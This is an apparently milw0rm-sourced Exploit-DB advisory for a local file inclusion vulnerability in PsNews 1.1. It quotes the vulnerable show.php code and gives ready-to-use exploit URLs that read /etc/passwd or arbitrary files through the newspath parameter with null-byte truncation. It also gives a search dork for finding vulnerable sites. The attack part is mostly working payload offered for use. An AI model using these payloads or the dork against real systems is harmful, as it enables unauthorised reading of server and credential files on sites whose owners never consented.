PsNews 1.1 - 'show.php?newspath' Local File Inclusion

EDB-ID:

4174

Author:

irk4z

Type:

webapps

Platform:

PHP

Published:

2007-07-12

#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dostęp!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# milw0rm.com [2007-07-12]